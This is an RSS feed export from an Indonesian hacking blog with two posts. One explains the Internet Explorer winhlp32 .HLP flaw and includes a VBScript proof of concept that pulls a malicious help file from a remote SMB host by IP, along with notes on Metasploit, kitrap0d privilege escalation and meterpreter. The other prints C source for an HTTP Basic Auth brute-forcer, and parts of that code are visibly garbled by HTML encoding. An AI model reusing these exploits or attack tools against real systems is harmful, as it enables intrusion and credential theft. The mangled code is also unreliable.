<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2077944732030875776</atom:id><lastBuildDate>Mon, 02 Sep 2024 06:00:36 +0000</lastBuildDate><category>Komputer</category><category>Hacking</category><category>Jaringan</category><category>Internet</category><category>Virus</category><title>:::POWER OF TECHNOLOGY:::</title><description></description><link>http://xpemula.blogspot.com/</link><managingEditor>noreply@blogger.com (BlackSignal)</managingEditor><generator>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-771525617813889861</guid><pubDate>Thu, 03 Jun 2010 01:19:00 +0000</pubDate><atom:updated>2010-06-13T23:15:11.122-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Bug Internet Explorer</title><description>Atikel berikut ini merupakan artikel yang diusung oleh &lt;a href="http://kecoak-elektronik.net/"&gt;Kecoak Elektronik&lt;/a&gt; yang membahas tentang adanya &lt;a href="http://xpemula.blogspot.com/"&gt;bug pada intenet Explorer versi 6, 7 dan 8&lt;/a&gt;. Kenapa saya memasukkan artikel ini? Karena saya pikir, artikel ini sangatlah penting mengingat pengguna Internet Explorer sangatlah banyak.&amp;nbsp; Berikut artikel selengkapnya...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pada tanggal 26 February 2010, &lt;a href="http://twitter.com/mprodeus" target="_blank"&gt;Maurycy Prodeus&lt;/a&gt; mengeluarkan &lt;a href="http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt" target="_blank"&gt;public disclosure&lt;/a&gt; terhadap bug &lt;b&gt;internet explorer 6, 7, dan 8&lt;/b&gt; yang dapat di-eksploitasi menggunakan malicious .HLP file. Berikut ini pernyataan dari maurycy,&lt;br /&gt;
&lt;blockquote&gt;&lt;i&gt;It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6&lt;br /&gt;
using VBScript. Passing malicious .HLP file to winhlp32 could allow&lt;br /&gt;
remote attacker to run arbitrary command.&lt;br /&gt;
Additionally, there is a stack overflow vulnerability in winhlp32.exe&lt;/i&gt;&lt;/blockquote&gt;Intinya, dengan memanfaatkan VBScript maka user dapat meng-ekesekusi winhlp32.exe untuk membuka suatu file bertipe .hlp (windows help file) melalui browser internet explorer 6, 7, 8. Dan jika file .hlp tersebut sudah dimodifikasi sehingga menjadi malicious .hlp maka user dapat di-eksploitasi untuk menjalankan malicious code. &lt;a href="http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx" target="_blank"&gt;Pihak microsoft&lt;/a&gt; untuk sementara memasukan ekstensi file .hlp kedalam kategori ‘unsafe file types’.&lt;br /&gt;
Untuk men-trigger vulnerability diatas cukup unik dan membutuhkan interaksi dari user untuk menekan tombol F1 ketika MessageBox muncul. Syntax untuk menampilkan MessageBox melalui VBScript sebagai berikut,&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table bgcolor="black" border="1" style="width: 400px;"&gt;&lt;tbody&gt;
&lt;tr bgcolor="green"&gt; &lt;td align="center"&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;MsgBox(prompt[,buttons][,title][,helpfile,context])&lt;/div&gt;&lt;br /&gt;
&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Windows help file pada syntax diatas dapat diakses menggunakan samba share, berikut ini PoC dari maurycy untuk men-trigger vulnerability tersebut dan membuat user mengkases malicious .hlp file dari samba share yang telah dipersiapkannya,&lt;br /&gt;
&lt;br /&gt;
&lt;code class="xml plain"&gt;'&amp;lt;&lt;/code&gt;&lt;code class="xml keyword"&gt;script&lt;/code&gt; &lt;code class="xml color1"&gt;type&lt;/code&gt;&lt;code class="xml plain"&gt;=&lt;/code&gt;&lt;code class="xml string"&gt;"text/vbscript"&lt;/code&gt;&lt;code class="xml plain"&gt;&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="xml plain"&gt;// PoC pertama&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="xml plain"&gt;big = "\\184.73.14.110\PUBLIC\test.hlp"&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="xml plain"&gt;MsgBox "please press F1 to save the world", ,"please save the world", big, 1&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="xml plain"&gt;MsgBox "press F1 to close this annoying popup", ,"", big, 1&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="xml plain"&gt;MsgBox "press F1 to close this annoying popup", ,"", big, 1&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;code class="xml plain"&gt;&amp;lt;'/&lt;/code&gt;&lt;code class="xml keyword"&gt;script&lt;/code&gt;&lt;code class="xml plain"&gt;&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
PoC tersebut dapat dilihat dari &lt;a href="http://isec.pl/poc-isec27/"&gt;sini&lt;/a&gt;.&lt;br /&gt;
Jelas terlihat bahwa malicious .hlp file yang digunakan terletak pada \\184.73.14.110\PUBLIC\test.hlp. Ketika user terpancing untuk mengeksekusi maka win32hlp.exe akan berusaha membuka test.hlp tersebut yang justru mengakibatkan eksekusi calc.exe.&lt;br /&gt;
Maurycy memberikan PoC tambahan bahwa terdapat bug stack-overflow pada win32hlp.exe ketika mengeksekusi parameter dengan path yang sangat panjang, namun berhubung win32hlp.exe di-compile menggunakan feature /GS maka bug tersebut tidak dapat di-eksploitasi begitu saja.&lt;br /&gt;
Saat ini \\184.73.14.110\PUBLIC\test.hlp tidak dapat diakses lagi, namun &lt;a href="https://sites.google.com/site/blackerzones/"&gt;metasploit&lt;/a&gt; sudah memasukan exploit win32hlp tersebut kedalam trunk terbarunya. Ketika tulisan ini dibuat, versi trunk yang dimaksud adalah SVN r8723. Jika kalian penasaran ingin melihat malicious .hlp yang sebelumnya digunakan oleh maurycy, maka dapat melihat dari direktori metasploit di ‘data/exploits/runcalc.hlp’.&lt;br /&gt;
Jduck meng-integrasikan &lt;a href="http://xpemula.blogspot.com/2010/05/exploit_30.html"&gt;exploit&lt;/a&gt; tersebut kedalam metasploit framework menggunakan fasilitas WebDAV, sehingga kita tidak perlu membuat samba server untuk dapat diakses oleh target. Dengan beberapa trik yang memanfaatkan protocol WebDAV kita dapat meng-eksploitasi target dengan vulnerability diatas. Kategori eksploit ini masuk dalam ‘browser exploitaion’.&lt;br /&gt;
Contoh penggunaannya silahkan lihat &lt;a href="http://sites.google.com/site/blackerzones/index-1/xp-bs-a1.txt"&gt;DISINI&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Sampai saat ini saya masih belum bisa menemukan letak masalah ketika metasploit digunakan dilingkungan Mac OSX, pemanfaatan feature webdav nya tidak berjalan dengan baik. Namun untuk metasploit yang berjalan diatas windows, exploit tersebut berhasil dieksekusi dengan baik seperti pada contoh diatas (anyone tried on linux?).&lt;br /&gt;
&lt;a href="http://xpemula.blogspot.com/2010/05/exploit_30.html"&gt;Exploit&lt;/a&gt; ini dapat digunakan pada feature ‘browser autopwn’-nya metasploit, so buat kalian para whitehat mulai dapat menikmati exploit ini untuk ditunjukan pada client saat proses pentest *heh*.&lt;br /&gt;
Finish?no. Sebagaimana terlihat dalam judul diatas, ada satu hal lagi yang akan kita bahas &lt;img alt=":)" class="wp-smiley" src="http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_smile.gif" /&gt; .&lt;br /&gt;
Pada 19 Januari 2010 yang lalu, tavis ormandy merilis public disclosure yang cukup (sangat?) menghebohkan, terutama bagi para pemerhati dunia security windows. Advisories yang dirilis oleh taviso dapat dilihat dari &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"&gt;sini&lt;/a&gt;, inti dari advisories tersebut adalah sistem operasi microsoft windows menyimpan bug yang sifatnya 0day sejak tahun 1993. Bug tersebut di-klaim tetap ada sejak rilis Windows NT pada tanggal 27 Juli 1993 hingga implementasi Windows 7 saat ini (semua x86 32-bit windows vulnerable). &lt;br /&gt;
Pada saat public disclosure tersebut muncul tidak banyak pihak yang memahami ‘fungsi’-nya, contoh berikut ini ditambahkan dengan tujuan jika memang ada masyarakat indonesia yang belum mengerti (i knew, some of you are lazy to read english reference) maka dapat memahami fungsi dari exploitasi bug tersebut.&lt;br /&gt;
Intinya adalah kitrap0d digunakan sebagai local exploit untuk mendapatkan akses system pada windows. Jadi ketika kita berhasil meng-eksploitasi aplikasi dalam microsoft windows, namun akses yang kita dapatkan terbatas dalam arti user yang mengeksekusi adalah user biasa (non-administrator), maka dengan memanfaatkan exploit kitrap0d tersebut kita akan mendapatkan akses system yang tentu saja memberikan akses lebih tinggi. &lt;br /&gt;
Contoh paling mudah adalah memanfaatkan browser bug sebagai pintu masuk, seperti yang telah ditunjukan pada contoh diatas (bug win32hlp.exe), kita akan melihat informasi berikut ini:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;code class="bash plain"&gt;meterpreter &amp;gt; getuid&lt;/code&gt;&lt;code class="bash plain"&gt;Server username: XPSP2\user&lt;/code&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Hal tersebut didapatkan karena user yang dieksploitasi oleh exploit ie_win32hlp menggunakan user biasa (nama user nya ‘user’) ketika mengeksekusi exploit, dan ini biasanya dilakukan oleh ratusan bahkan ribuan pengguna komputer dalam suatu perusahaan atau organisasi dimana login kedalam windows tidak menggunakan hak akses administrator. &lt;br /&gt;
Metasploit mem-bundle exploit kitrap0d dengan meterpreter, sehingga kita dapat dengan mudah melakukan local exploit pada target windows untuk mendapatkan hak akses ’system’ jika paylod yang digunakan adalah meterpreter. Contohnya klik &lt;a href="http://sites.google.com/site/blackerzones/index-1/xp-bs-a2.txt"&gt;DISINI&lt;/a&gt;</description><link>http://xpemula.blogspot.com/2010/06/bug-internet-explorer.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-2010626641439556479</guid><pubDate>Sun, 30 May 2010 18:13:00 +0000</pubDate><atom:updated>2010-06-02T21:39:29.539-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Exploit</title><description>&lt;div style="text-align: justify;"&gt;Exploit atau exploitasi merupakan sebuah aksi yang memanfaatkan celah atau kelemahan pada sebuah system, bisa juga berupa bug yang terdapat pada system tersebut.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Exploit digunakan untuk menjalankan sebuah perintah yang akan memberikan akses khusus untuk melakukan tujuan tertentu yang tidak dapat dilakukan pada kondisi normal. Exploit sendiri deprogram dengan menggunakan bahasa C, perl, atau sh. Untuk mendapatkan exploit itu tidaklah susah, banyak sekali situs yang menyediakannya. Sebut saja milworm, antionline, packetstormsecurity, dll.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Exploit bisa dibedakan kedalam dua kategori,&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Exploit Lokal&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Exploit lokal dapat dilakukan hanya apabila seseorang memiliki hak akses untuk menggunakan sebuah sistem, atau exploit yang hanya digunakan pada kompuer itu sendiri. Contoh exploit lokal&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- Buffer Overflow&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- Race Conditions&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Remote Exploit&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Remote exploit dapat terjadi dimana seseorang bisa mengeksploitasi sistem tanpa harus mengetahui username dan password, atau exploit yang dapat dieksekusi dari jarak jauh. Biasanya remote exploit bisa jadi lokal exploit walaupun tidak sebaliknya.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Berikut ini saya berikan sebuah contoh exploit yang cukup terkenal yaitu brute_ssl. Exploit ini dibuat untuk mengilustrasikan sebuah kelemahan pada HTTP Basic Authorization. Protokol HTTP mengizinkan user untuk keluar dengan membuat banyak guest. Exploit ini akan terkoneksi dengan web server yang secure ataupun yang umum dan mencoba untuk mengalikan kombinasi username dan password sampai ditemukan yang tepat.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Untuk melakukannya diperlukan liberary SSLeay yang bisa didapatkan dari ftp://ftp.psy.ug.oz.au/pub/crypto/SSL/ ini bekerja pada SSLeay – 0.8.0 setelah di build, jalankan dengan perintah:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Cc –o brute_ssl –l/usr/local/ssl/include brute_ssl.c \&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-l /usr/local/ssl/lib –lssl –lcrypto&lt;/div&gt;&lt;br /&gt;
Jalankan binary tanpa argument apapun untuk melihat parameternya.&lt;br /&gt;
&lt;br /&gt;
Berikut scriptnya:&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;form name="copy"&gt;&lt;div align="center"&gt;&lt;span class="fullpost"&gt;&lt;input onclick="javascript:this.form.txt.focus();this.form.txt.select();" type="button" value="Highlight All" /&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;textarea cols="55" name="txt" rows="100" style="height: 144px; width: 600px;" wrap="VIRTUAL"&gt;&amp;lt;/code&amp;gt;&amp;lt;/span&amp;gt;/*&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; *                 Brute Web (SSL) v2.0&amp;lt;br /&amp;gt; *                Coded by BeastMaster V&amp;lt;br /&amp;gt; *            September 13,1997&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; * [NOTES]&amp;lt;br /&amp;gt; * This program was written to illustrate what I see as&amp;lt;br /&amp;gt; * a weakness with HTTP Basic Authorization. The HTTP protocol&amp;lt;br /&amp;gt; * let's you get away with making as many guesses as you&amp;lt;br /&amp;gt; * wish to make when it comes to Basic Authorization. This&amp;lt;br /&amp;gt; * program will connect to a regular or secure web server and&amp;lt;br /&amp;gt; * try multiple username/password combinations until it finds&amp;lt;br /&amp;gt; * the right one and prints out what the username and password&amp;lt;br /&amp;gt; * was for the protected realm. I have only tested this on&amp;lt;br /&amp;gt; * Linux, so you might have to do a little porting to get it&amp;lt;br /&amp;gt; * to work on other platforms. It should be simple though.&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; * [HOWTO]&amp;lt;br /&amp;gt; * To get up and running, you will first need to ftp the SSLeay&amp;lt;br /&amp;gt; * libraries from ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/&amp;lt;br /&amp;gt; * This was written to work with SSLeay-0.8.0. Now after you&amp;lt;br /&amp;gt; * get this compiled and installed, you can build this program&amp;lt;br /&amp;gt; * with a command like:&amp;lt;br /&amp;gt; * cc -o brute_ssl -I/usr/local/ssl/include brute_ssl.c \&amp;lt;br /&amp;gt; *                  -L/usr/local/ssl/lib -lssl -lcrypto&amp;lt;br /&amp;gt; * Run the binary without any arguments to see the parameters&amp;lt;br /&amp;gt; * that the program takes.&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; * [COMMENTS]&amp;lt;br /&amp;gt; * All comments, gripes, flames, etc. should be sent to&amp;lt;br /&amp;gt; *     bryan@scott.net&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; * [DISCLAIMER]&amp;lt;br /&amp;gt; * I am not responsible for anything you do with this,&amp;lt;br /&amp;gt; * so please use this program in a responsible manner.&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; * [WARNING]&amp;lt;br /&amp;gt; * If the webserver you are using this on does logging, then&amp;lt;br /&amp;gt; * it will be quite obvious that you are attacking.&amp;lt;br /&amp;gt; *&amp;lt;br /&amp;gt; */&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; #include &amp;lt;errno.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;stdio.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;stdlib.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;string.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;stdarg.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;sys/types.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;sys/time.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;sys/ioctl.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;sys/socket.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;netinet/in.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;netdb.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;unistd.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;fcntl.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;signal.h&amp;gt;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; #include &amp;lt;rsa.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;crypto.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;x509.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;pem.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;ssl.h&amp;gt;&amp;lt;br /&amp;gt; #include &amp;lt;err.h&amp;gt;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; extern int errno, h_errno;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; #define SPACELEFT(buf,ptr) (sizeof buf-((ptr)-buf))&amp;lt;br /&amp;gt; #define newstr(s) strcpy(malloc(strlen(s)+1),s)&amp;lt;br /&amp;gt; #define HTTPD_UNAUTHORIZED 401&amp;lt;br /&amp;gt; #define FL __FILE__,__LINE__&amp;lt;br /&amp;gt; #define MAXDICTWORD 64&amp;lt;br /&amp;gt; #define MAXNAMEPASSLEN 128&amp;lt;br /&amp;gt; #define MAXENCODEDSTRING 256&amp;lt;br /&amp;gt; #define MAXSENDSTRING 300&amp;lt;br /&amp;gt; #define HAS_DICTIONARY 0x0001&amp;lt;br /&amp;gt; #define HAS_USERNAME   0x0002&amp;lt;br /&amp;gt; #define HAS_PORTNUMBER 0x0004&amp;lt;br /&amp;gt; #define HAS_HOSTNAME   0x0008&amp;lt;br /&amp;gt; #define HAS_VERBOSE    0x0010&amp;lt;br /&amp;gt; #define HAS_SSL_OPT    0x0020&amp;lt;br /&amp;gt; #define HAS_REALM      0x0040&amp;lt;br /&amp;gt; #define HAS_DONE_IT    0x0080&amp;lt;br /&amp;gt; #if SSLEAY_VERSION_NUMBER &amp;gt;= 0x0800&amp;lt;br /&amp;gt; #define SSLEAY8&amp;lt;br /&amp;gt; #endif&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; char alphabet[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";&amp;lt;br /&amp;gt; char *prg_nme;&amp;lt;br /&amp;gt; int mask;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; struct BASE64_PARAMS&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; unsigned long int accum;&amp;lt;br /&amp;gt; int shift;&amp;lt;br /&amp;gt; int save_shift;&amp;lt;br /&amp;gt; };&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* BeastMaster V's error logging function */&amp;lt;br /&amp;gt; void proc_err(char *func,char *file,int line,const char *fmt, ...)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; va_list args;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (prg_nme!=NULL)&amp;lt;br /&amp;gt; fprintf(stderr,"[%s]", prg_nme);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; va_start(args, fmt);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; fprintf(stderr," %s() ",func);&amp;lt;br /&amp;gt; fprintf(stderr,"&amp;lt;file:%s&amp;gt; : ",file,line);&amp;lt;br /&amp;gt; vfprintf(stderr, fmt, args);&amp;lt;br /&amp;gt; fputc('\n', stderr);&amp;lt;br /&amp;gt; fflush(stderr);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; va_end(args);&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* an implementation of signal() based on sigaction() */&amp;lt;br /&amp;gt; void (*r_signal(int sig,void(*func)())) (int)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; struct sigaction act, oact;&amp;lt;br /&amp;gt; act.sa_handler = func;&amp;lt;br /&amp;gt; sigemptyset(&amp;amp;act.sa_mask);&amp;lt;br /&amp;gt; act.sa_flags = 0;&amp;lt;br /&amp;gt; #ifdef SA_RESTART&amp;lt;br /&amp;gt; act.sa_flags |= SA_RESTART;&amp;lt;br /&amp;gt; #endif&amp;lt;br /&amp;gt; if (sigaction(sig, &amp;amp;act, &amp;amp;oact) &amp;lt; i="0,done=" i="=" w="SSL_read(ssl_con,tmp,1);" w="=" done="1;" i="0," done="0;" i="=" w="read(s" w="=" done =" 1;" z="0;" index =" 0;"&amp;gt;shift!=0))&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; if ((*(string_to_encode+z))&amp;amp;&amp;amp;(quit==0))&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; blivit = *(string_to_encode +z);&amp;lt;br /&amp;gt; z++;&amp;lt;br /&amp;gt; if (*(string_to_encode+z)==0)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; quit = 1;&amp;lt;br /&amp;gt; e_p-&amp;gt;save_shift=e_p-&amp;gt;shift;&amp;lt;br /&amp;gt; blivit=0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; quit=1;&amp;lt;br /&amp;gt; e_p-&amp;gt;save_shift=e_p-&amp;gt;shift;&amp;lt;br /&amp;gt; blivit=0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; if ((quit==0)||(e_p-&amp;gt;shift!= 0))&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; value=(unsigned long)blivit;&amp;lt;br /&amp;gt; e_p-&amp;gt;accum &amp;lt;&amp;lt;= 8;                  e_p-&amp;gt;shift += 8;&amp;lt;br /&amp;gt; e_p-&amp;gt;accum |= value;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; while (e_p-&amp;gt;shift &amp;gt;= 6)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; e_p-&amp;gt;shift -= 6;&amp;lt;br /&amp;gt; value = (e_p-&amp;gt;accum &amp;gt;&amp;gt; e_p-&amp;gt;shift) &amp;amp; 0x3Fl;&amp;lt;br /&amp;gt; blivit = alphabet[value];&amp;lt;br /&amp;gt; *(buf_64+(index++)) = blivit;&amp;lt;br /&amp;gt; if (index &amp;gt;= 60)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+index)='\0';&amp;lt;br /&amp;gt; index = 0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; if ( quit != 0 )&amp;lt;br /&amp;gt; e_p-&amp;gt;shift = 0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; if (e_p-&amp;gt;save_shift==2)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+(index++))='=';&amp;lt;br /&amp;gt; if (index&amp;gt;=60)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+index)='\0';&amp;lt;br /&amp;gt; index=0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; *(buf_64+(index++))='=';&amp;lt;br /&amp;gt; if (index&amp;gt;=60 )&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+index)='\0';&amp;lt;br /&amp;gt; index=0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; else if (e_p-&amp;gt;save_shift==4)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+(index++))='=';&amp;lt;br /&amp;gt; if (index&amp;gt;=60)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; *(buf_64+index)='\0';&amp;lt;br /&amp;gt; index=0;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; if (index!=0)&amp;lt;br /&amp;gt; *(buf_64+index)='\0';&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; return quit;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* takes string to encode and a user supplied buffer as parameters */&amp;lt;br /&amp;gt; void encode_string (char *name_pass,char *buf_64)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; struct BASE64_PARAMS e_p;&amp;lt;br /&amp;gt; int quit=0;&amp;lt;br /&amp;gt; register int i;&amp;lt;br /&amp;gt; char s[MAXNAMEPASSLEN+3];&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; e_p.shift = 0;&amp;lt;br /&amp;gt; e_p.accum = 0;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; sprintf(s,"%s%c",name_pass,*(name_pass+strlen(name_pass)-1));&amp;lt;br /&amp;gt; base64_encode(quit, &amp;amp;e_p, s,buf_64);&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; return;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* check the web server's HTTP response headers */&amp;lt;br /&amp;gt; short check_response (char *response)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; short ScanCount;&amp;lt;br /&amp;gt; int httpd_code;&amp;lt;br /&amp;gt; short version;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; ScanCount=sscanf(response,"HTTP/1.%d %d",&amp;amp;version,&amp;amp;httpd_code);&amp;lt;br /&amp;gt; if (ScanCount!=2)&amp;lt;br /&amp;gt; return 0;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; if (httpd_code==HTTPD_UNAUTHORIZED)&amp;lt;br /&amp;gt; return 0;&amp;lt;br /&amp;gt; else&amp;lt;br /&amp;gt; return 1;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; /* reads a line from a file */&amp;lt;br /&amp;gt; short read_line(FILE *fp, char *buf)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; int c;&amp;lt;br /&amp;gt; short done=0;&amp;lt;br /&amp;gt; short i=0;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; while (!done)&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; c=fgetc(fp);&amp;lt;br /&amp;gt; if (c==EOF)&amp;lt;br /&amp;gt; return 0;&amp;lt;br /&amp;gt; if (c=='\n')&amp;lt;br /&amp;gt; {&amp;lt;br /&amp;gt; done=1;&amp;lt;br /&amp;gt; break;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; if (c)&amp;lt;br /&amp;gt; *(buf+i)=c;&amp;lt;br /&amp;gt; i++;&amp;lt;br /&amp;gt; }&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; *(buf+i)='\0';&amp;lt;br /&amp;gt; return i;&amp;lt;br /&amp;gt; }&amp;lt;br 